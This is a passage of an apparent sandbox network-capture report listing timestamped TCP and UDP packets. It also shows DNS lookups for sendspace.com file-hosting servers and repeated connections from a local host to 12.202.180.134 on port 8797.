                                                                                              May 23, 2024 21:03:00.250078917 CEST49699443192.168.2.6104.21.28.80
                                                                                              May 23, 2024 21:03:00.250093937 CEST44349699104.21.28.80192.168.2.6
                                                                                              May 23, 2024 21:03:00.721167088 CEST44349699104.21.28.80192.168.2.6
                                                                                              May 23, 2024 21:03:00.721265078 CEST49699443192.168.2.6104.21.28.80
                                                                                              May 23, 2024 21:03:00.725183964 CEST49699443192.168.2.6104.21.28.80
                                                                                              May 23, 2024 21:03:00.725193977 CEST44349699104.21.28.80192.168.2.6
                                                                                              May 23, 2024 21:03:00.725425005 CEST44349699104.21.28.80192.168.2.6
                                                                                              May 23, 2024 21:03:00.737905979 CEST49699443192.168.2.6104.21.28.80
                                                                                              May 23, 2024 21:03:00.778490067 CEST44349699104.21.28.80192.168.2.6
                                                                                              May 23, 2024 21:03:00.981204033 CEST44349699104.21.28.80192.168.2.6
                                                                                              May 23, 2024 21:03:00.981265068 CEST44349699104.21.28.80192.168.2.6
                                                                                              May 23, 2024 21:03:00.981369019 CEST49699443192.168.2.6104.21.28.80
                                                                                              May 23, 2024 21:03:01.036201954 CEST49699443192.168.2.6104.21.28.80
                                                                                              May 23, 2024 21:03:01.120737076 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:01.120781898 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:01.120919943 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:01.121517897 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:01.121531963 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.103631973 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.103773117 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.106656075 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.106666088 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.107038975 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.108335018 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.150492907 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.408648968 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.408679962 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.408698082 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.408761024 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.408778906 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.408811092 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.408833981 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.432322025 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.432344913 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.432463884 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.432491064 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.432528019 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.498148918 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.498172045 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.498251915 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.498265982 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.498301029 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.516700029 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.516717911 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.516781092 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.516788006 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.516844988 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.532845974 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.532866955 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.532924891 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.532932043 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.532968044 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.544464111 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.544481993 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.544616938 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.544624090 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.544708014 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.589982033 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.590003967 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.590095997 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.590104103 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.590145111 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.602592945 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.602610111 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.602653980 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.602660894 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.602705956 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.602722883 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.618289948 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.618307114 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.618359089 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.618365049 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.618400097 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.627022982 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.627042055 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.627125978 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.627132893 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.627171040 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.636631012 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.636647940 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.636718988 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.636725903 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.636761904 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.680526972 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.680547953 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.680687904 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.680706024 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.680744886 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.688232899 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.688251019 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.688338995 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.688348055 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.688386917 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.695287943 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.695305109 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.695359945 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.695368052 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.695400953 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.701086998 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.701107025 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.701163054 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.701174021 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.701216936 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.706595898 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.706613064 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.706651926 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.706660032 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.706696033 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.706715107 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.711600065 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.711618900 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.711688995 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.711697102 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.711745024 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.716095924 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.716115952 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.716176987 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.716183901 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.716217041 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.720231056 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.720247030 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.720302105 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.720309973 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.720343113 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.766474009 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.766498089 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.766640902 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.766654968 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.766715050 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.769834042 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.769854069 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.769913912 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.769921064 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.769953966 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.774296045 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.774312019 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.774375916 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.774384975 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.774419069 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.784976959 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.784993887 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.785059929 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.785073996 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.785110950 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.787935019 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.787950993 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.787992001 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.788002968 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.788048983 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.788070917 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.790657997 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.790674925 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.790724993 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.790731907 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.790766001 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.793601036 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.793617010 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.793663025 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.793672085 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.793682098 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.793704033 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.796314955 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.796329975 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.796380043 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.796389103 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.796427011 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.857446909 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.857465982 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.857506037 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.857517958 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.857558966 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.860075951 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.860093117 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.860132933 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.860141039 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.860177994 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.862355947 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.862391949 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.862420082 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.862426043 CEST4434970069.31.136.57192.168.2.6
                                                                                              May 23, 2024 21:03:02.862446070 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.862467051 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:02.862703085 CEST49700443192.168.2.669.31.136.57
                                                                                              May 23, 2024 21:03:47.735172033 CEST49708443192.168.2.6104.21.28.80
                                                                                              May 23, 2024 21:03:47.735219955 CEST44349708104.21.28.80192.168.2.6
                                                                                              May 23, 2024 21:03:47.735323906 CEST49708443192.168.2.6104.21.28.80
                                                                                              May 23, 2024 21:03:47.849853039 CEST49708443192.168.2.6104.21.28.80
                                                                                              May 23, 2024 21:03:47.849884987 CEST44349708104.21.28.80192.168.2.6
                                                                                              May 23, 2024 21:03:48.354563951 CEST44349708104.21.28.80192.168.2.6
                                                                                              May 23, 2024 21:03:48.354691982 CEST49708443192.168.2.6104.21.28.80
                                                                                              May 23, 2024 21:03:49.941158056 CEST49708443192.168.2.6104.21.28.80
                                                                                              May 23, 2024 21:03:49.941184998 CEST44349708104.21.28.80192.168.2.6
                                                                                              May 23, 2024 21:03:49.941555977 CEST44349708104.21.28.80192.168.2.6
                                                                                              May 23, 2024 21:03:49.941715002 CEST49708443192.168.2.6104.21.28.80
                                                                                              May 23, 2024 21:03:49.947578907 CEST49708443192.168.2.6104.21.28.80
                                                                                              May 23, 2024 21:03:49.990493059 CEST44349708104.21.28.80192.168.2.6
                                                                                              May 23, 2024 21:03:50.170835018 CEST44349708104.21.28.80192.168.2.6
                                                                                              May 23, 2024 21:03:50.170938015 CEST44349708104.21.28.80192.168.2.6
                                                                                              May 23, 2024 21:03:50.171045065 CEST49708443192.168.2.6104.21.28.80
                                                                                              May 23, 2024 21:03:50.171143055 CEST49708443192.168.2.6104.21.28.80
                                                                                              May 23, 2024 21:03:50.184950113 CEST49708443192.168.2.6104.21.28.80
                                                                                              May 23, 2024 21:03:50.184972048 CEST44349708104.21.28.80192.168.2.6
                                                                                              May 23, 2024 21:03:50.226385117 CEST49709443192.168.2.669.31.136.17
                                                                                              May 23, 2024 21:03:50.226435900 CEST4434970969.31.136.17192.168.2.6
                                                                                              May 23, 2024 21:03:50.226586103 CEST49709443192.168.2.669.31.136.17
                                                                                              May 23, 2024 21:03:50.226954937 CEST49709443192.168.2.669.31.136.17
                                                                                              May 23, 2024 21:03:50.226977110 CEST4434970969.31.136.17192.168.2.6
                                                                                              May 23, 2024 21:03:51.044821978 CEST4434970969.31.136.17192.168.2.6
                                                                                              May 23, 2024 21:03:51.045083046 CEST49709443192.168.2.669.31.136.17
                                                                                              May 23, 2024 21:03:51.053014040 CEST49709443192.168.2.669.31.136.17
                                                                                              May 23, 2024 21:03:51.053037882 CEST4434970969.31.136.17192.168.2.6
                                                                                              May 23, 2024 21:03:51.053406000 CEST4434970969.31.136.17192.168.2.6
                                                                                              May 23, 2024 21:03:51.053476095 CEST49709443192.168.2.669.31.136.17
                                                                                              May 23, 2024 21:03:51.060946941 CEST49709443192.168.2.669.31.136.17
                                                                                              May 23, 2024 21:03:51.102554083 CEST4434970969.31.136.17192.168.2.6
                                                                                              May 23, 2024 21:03:51.308095932 CEST4434970969.31.136.17192.168.2.6
                                                                                              May 23, 2024 21:03:51.308136940 CEST4434970969.31.136.17192.168.2.6
                                                                                              May 23, 2024 21:03:51.308156013 CEST4434970969.31.136.17192.168.2.6
                                                                                              May 23, 2024 21:03:51.308346987 CEST49709443192.168.2.669.31.136.17
                                                                                              May 23, 2024 21:03:51.308346987 CEST49709443192.168.2.669.31.136.17
                                                                                              May 23, 2024 21:03:51.308379889 CEST4434970969.31.136.17192.168.2.6
                                                                                              May 23, 2024 21:03:51.308437109 CEST49709443192.168.2.669.31.136.17
                                                                                              May 23, 2024 21:03:51.329765081 CEST4434970969.31.136.17192.168.2.6
                                                                                              May 23, 2024 21:03:51.329791069 CEST4434970969.31.136.17192.168.2.6
                                                                                              May 23, 2024 21:03:51.329886913 CEST49709443192.168.2.669.31.136.17
                                                                                              May 23, 2024 21:03:51.329916954 CEST4434970969.31.136.17192.168.2.6
                                                                                              May 23, 2024 21:03:51.329962969 CEST49709443192.168.2.669.31.136.17
                                                                                              May 23, 2024 21:03:51.345180988 CEST4434970969.31.136.17192.168.2.6
                                                                                              May 23, 2024 21:03:51.345249891 CEST4434970969.31.136.17192.168.2.6
                                                                                              May 23, 2024 21:03:51.345274925 CEST4434970969.31.136.17192.168.2.6
                                                                                              May 23, 2024 21:03:51.345279932 CEST49709443192.168.2.669.31.136.17
                                                                                              May 23, 2024 21:03:51.345329046 CEST49709443192.168.2.669.31.136.17
                                                                                              May 23, 2024 21:03:51.345582008 CEST49709443192.168.2.669.31.136.17
                                                                                              May 23, 2024 21:03:51.345597982 CEST4434970969.31.136.17192.168.2.6
                                                                                              May 23, 2024 21:03:55.988231897 CEST497118797192.168.2.612.202.180.134
                                                                                              May 23, 2024 21:03:55.993391991 CEST87974971112.202.180.134192.168.2.6
                                                                                              May 23, 2024 21:03:55.993499994 CEST497118797192.168.2.612.202.180.134
                                                                                              May 23, 2024 21:03:56.005697966 CEST497118797192.168.2.612.202.180.134
                                                                                              May 23, 2024 21:03:56.100275040 CEST87974971112.202.180.134192.168.2.6
                                                                                              May 23, 2024 21:03:56.699407101 CEST87974971112.202.180.134192.168.2.6
                                                                                              May 23, 2024 21:03:56.704078913 CEST87974971112.202.180.134192.168.2.6
                                                                                              May 23, 2024 21:03:56.704138994 CEST497118797192.168.2.612.202.180.134
                                                                                              May 23, 2024 21:03:56.709913969 CEST87974971112.202.180.134192.168.2.6
                                                                                              May 23, 2024 21:03:56.709980011 CEST497118797192.168.2.612.202.180.134
                                                                                              May 23, 2024 21:03:56.778237104 CEST87974971112.202.180.134192.168.2.6
                                                                                              May 23, 2024 21:03:56.782510996 CEST497118797192.168.2.612.202.180.134
                                                                                              May 23, 2024 21:03:56.792232990 CEST87974971112.202.180.134192.168.2.6
                                                                                              May 23, 2024 21:03:56.957372904 CEST87974971112.202.180.134192.168.2.6
                                                                                              May 23, 2024 21:03:57.047840118 CEST497118797192.168.2.612.202.180.134
                                                                                              May 23, 2024 21:03:57.419706106 CEST497118797192.168.2.612.202.180.134
                                                                                              May 23, 2024 21:03:57.437757969 CEST87974971112.202.180.134192.168.2.6
                                                                                              May 23, 2024 21:03:57.437822104 CEST497118797192.168.2.612.202.180.134
                                                                                              May 23, 2024 21:03:57.458534002 CEST87974971112.202.180.134192.168.2.6
                                                                                              May 23, 2024 21:03:58.292452097 CEST87974971112.202.180.134192.168.2.6
                                                                                              May 23, 2024 21:03:58.344716072 CEST497118797192.168.2.612.202.180.134
                                                                                              May 23, 2024 21:03:58.415000916 CEST87974971112.202.180.134192.168.2.6
                                                                                              May 23, 2024 21:03:58.655157089 CEST87974971112.202.180.134192.168.2.6
                                                                                              May 23, 2024 21:03:58.656655073 CEST497118797192.168.2.612.202.180.134
                                                                                              May 23, 2024 21:04:11.096646070 CEST497118797192.168.2.612.202.180.134
                                                                                              May 23, 2024 21:04:11.101754904 CEST87974971112.202.180.134192.168.2.6
                                                                                              May 23, 2024 21:04:11.101871967 CEST497118797192.168.2.612.202.180.134
                                                                                              May 23, 2024 21:04:11.106965065 CEST87974971112.202.180.134192.168.2.6
                                                                                              May 23, 2024 21:04:11.440272093 CEST87974971112.202.180.134192.168.2.6
                                                                                              May 23, 2024 21:04:11.569655895 CEST87974971112.202.180.134192.168.2.6
                                                                                              May 23, 2024 21:04:11.569828987 CEST497118797192.168.2.612.202.180.134
                                                                                              May 23, 2024 21:04:11.574992895 CEST497118797192.168.2.612.202.180.134
                                                                                              May 23, 2024 21:04:11.579969883 CEST87974971112.202.180.134192.168.2.6
                                                                                              May 23, 2024 21:04:11.580073118 CEST497118797192.168.2.612.202.180.134
                                                                                              May 23, 2024 21:04:11.588275909 CEST87974971112.202.180.134192.168.2.6
                                                                                              May 23, 2024 21:04:26.042347908 CEST497118797192.168.2.612.202.180.134
                                                                                              May 23, 2024 21:04:26.098664045 CEST87974971112.202.180.134192.168.2.6
                                                                                              May 23, 2024 21:04:26.098752975 CEST497118797192.168.2.612.202.180.134
                                                                                              May 23, 2024 21:04:26.113038063 CEST87974971112.202.180.134192.168.2.6
                                                                                              May 23, 2024 21:04:26.396013021 CEST87974971112.202.180.134192.168.2.6
                                                                                              May 23, 2024 21:04:26.528362989 CEST87974971112.202.180.134192.168.2.6
                                                                                              May 23, 2024 21:04:26.528556108 CEST497118797192.168.2.612.202.180.134
                                                                                              May 23, 2024 21:04:26.530860901 CEST497118797192.168.2.612.202.180.134
                                                                                              May 23, 2024 21:04:26.582918882 CEST87974971112.202.180.134192.168.2.6
                                                                                              May 23, 2024 21:04:26.583008051 CEST497118797192.168.2.612.202.180.134
                                                                                              May 23, 2024 21:04:26.590049028 CEST87974971112.202.180.134192.168.2.6
                                                                                              May 23, 2024 21:04:28.290770054 CEST87974971112.202.180.134192.168.2.6
                                                                                              May 23, 2024 21:04:28.344911098 CEST497118797192.168.2.612.202.180.134
                                                                                              May 23, 2024 21:04:28.415874958 CEST87974971112.202.180.134192.168.2.6
                                                                                              May 23, 2024 21:04:28.469736099 CEST497118797192.168.2.612.202.180.134
                                                                                              May 23, 2024 21:04:39.737154007 CEST497118797192.168.2.612.202.180.134
                                                                                              May 23, 2024 21:04:39.866760969 CEST87974971112.202.180.134192.168.2.6
                                                                                              May 23, 2024 21:04:39.867017984 CEST497118797192.168.2.612.202.180.134
                                                                                              May 23, 2024 21:04:39.872324944 CEST87974971112.202.180.134192.168.2.6
                                                                                              May 23, 2024 21:04:40.162009954 CEST87974971112.202.180.134192.168.2.6
                                                                                              May 23, 2024 21:04:40.204128027 CEST497118797192.168.2.612.202.180.134
                                                                                              May 23, 2024 21:04:40.295406103 CEST87974971112.202.180.134192.168.2.6
                                                                                              May 23, 2024 21:04:40.300441027 CEST497118797192.168.2.612.202.180.134
                                                                                              May 23, 2024 21:04:40.305670977 CEST87974971112.202.180.134192.168.2.6
                                                                                              May 23, 2024 21:04:40.305754900 CEST497118797192.168.2.612.202.180.134
                                                                                              May 23, 2024 21:04:40.311220884 CEST87974971112.202.180.134192.168.2.6
                                                                                              May 23, 2024 21:04:53.424329042 CEST497118797192.168.2.612.202.180.134
                                                                                              May 23, 2024 21:04:53.429450035 CEST87974971112.202.180.134192.168.2.6
                                                                                              May 23, 2024 21:04:53.429528952 CEST497118797192.168.2.612.202.180.134
                                                                                              May 23, 2024 21:04:53.434448957 CEST87974971112.202.180.134192.168.2.6
                                                                                              May 23, 2024 21:04:53.732158899 CEST87974971112.202.180.134192.168.2.6
                                                                                              May 23, 2024 21:04:53.782305956 CEST497118797192.168.2.612.202.180.134
                                                                                              May 23, 2024 21:04:53.899279118 CEST87974971112.202.180.134192.168.2.6
                                                                                              May 23, 2024 21:04:53.905433893 CEST497118797192.168.2.612.202.180.134
                                                                                              May 23, 2024 21:04:53.918066025 CEST87974971112.202.180.134192.168.2.6
                                                                                              May 23, 2024 21:04:53.918181896 CEST497118797192.168.2.612.202.180.134
                                                                                              May 23, 2024 21:04:53.930468082 CEST87974971112.202.180.134192.168.2.6
                                                                                              May 23, 2024 21:04:58.312937975 CEST87974971112.202.180.134192.168.2.6
                                                                                              May 23, 2024 21:04:58.360384941 CEST497118797192.168.2.612.202.180.134
                                                                                              May 23, 2024 21:04:58.445142031 CEST87974971112.202.180.134192.168.2.6
                                                                                              May 23, 2024 21:04:58.485385895 CEST497118797192.168.2.612.202.180.134
                                                                                              May 23, 2024 21:05:05.736110926 CEST497118797192.168.2.612.202.180.134
                                                                                              May 23, 2024 21:05:05.741117954 CEST87974971112.202.180.134192.168.2.6
                                                                                              May 23, 2024 21:05:05.741189957 CEST497118797192.168.2.612.202.180.134
                                                                                              May 23, 2024 21:05:05.746052980 CEST87974971112.202.180.134192.168.2.6
                                                                                              May 23, 2024 21:05:06.055243969 CEST87974971112.202.180.134192.168.2.6
                                                                                              May 23, 2024 21:05:06.110378981 CEST497118797192.168.2.612.202.180.134
                                                                                              May 23, 2024 21:05:06.208471060 CEST87974971112.202.180.134192.168.2.6
                                                                                              May 23, 2024 21:05:06.209434032 CEST497118797192.168.2.612.202.180.134
                                                                                              May 23, 2024 21:05:06.214848042 CEST87974971112.202.180.134192.168.2.6
                                                                                              May 23, 2024 21:05:06.214967012 CEST497118797192.168.2.612.202.180.134
                                                                                              May 23, 2024 21:05:06.221776962 CEST87974971112.202.180.134192.168.2.6

                                                                                              UDP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              May 23, 2024 21:03:00.218532085 CEST6352553192.168.2.61.1.1.1
                                                                                              May 23, 2024 21:03:00.233020067 CEST53635251.1.1.1192.168.2.6
                                                                                              May 23, 2024 21:03:01.068005085 CEST5476653192.168.2.61.1.1.1
                                                                                              May 23, 2024 21:03:01.119997978 CEST53547661.1.1.1192.168.2.6
                                                                                              May 23, 2024 21:03:50.196595907 CEST5979453192.168.2.61.1.1.1
                                                                                              May 23, 2024 21:03:50.225409985 CEST53597941.1.1.1192.168.2.6
                                                                                              May 23, 2024 21:03:55.836729050 CEST5397753192.168.2.61.1.1.1
                                                                                              May 23, 2024 21:03:55.983450890 CEST53539771.1.1.1192.168.2.6

                                                                                              DNS Queries

                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                              May 23, 2024 21:03:00.218532085 CEST192.168.2.61.1.1.10xdafStandard query (0)www.sendspace.comA (IP address)IN (0x0001)false
                                                                                              May 23, 2024 21:03:01.068005085 CEST192.168.2.61.1.1.10x4d47Standard query (0)fs13n2.sendspace.comA (IP address)IN (0x0001)false
                                                                                              May 23, 2024 21:03:50.196595907 CEST192.168.2.61.1.1.10x95cbStandard query (0)fs03n5.sendspace.comA (IP address)IN (0x0001)false
